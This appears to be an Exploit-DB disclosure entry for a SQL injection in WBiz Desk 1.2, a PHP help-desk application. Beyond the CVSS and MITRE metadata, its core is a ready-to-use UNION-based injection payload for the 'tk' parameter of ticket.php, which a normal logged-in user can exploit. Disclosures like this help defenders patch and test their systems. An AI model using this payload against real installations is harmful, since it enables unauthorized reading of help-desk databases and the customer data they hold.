WBiz Desk 1.2 - SQL Injection

EDB-ID:

51451

CVE:

N/A


Author:

h4ck3r

Type:

webapps


Platform:

PHP

Date:

2023-05-23


[#] Exploit Title: WBiz Desk 1.2 - SQL Injection
[#] Exploit Date: May 12, 2023.
[#] CVSS 3.1: 6.4 (Medium)
[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
[#] Tactic: Initial Access (TA0001)
[#] Technique: Exploit Public-Facing Application (T1190)
[#] Application Name: WBiz Desk
[#] Application Version: 1.2
[#] Link: https://www.codester.com/items/5641/wbiz-desk-simple-and-effective-help-desk-system


[#] Author: h4ck3r - Faisal Albuloushi
[#] Contact: SQL@hotmail.co.uk
[#] Blog: https://www.0wl.tech


[#] 3xploit:

[path]//ticket.php?tk=[SQL Injection]


[#] 3xample:

[path]/ticket.php?tk=83' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6a6b71,0x534d6e485a74664750746b7553746a556b414e7064624b7672626b42454c74674f5669436a466a53,0x71626b6b71),NULL,NULL,NULL-- -


[#] Notes:
- The vulnerability requires a non-admin privilege (normal) user to be exploited.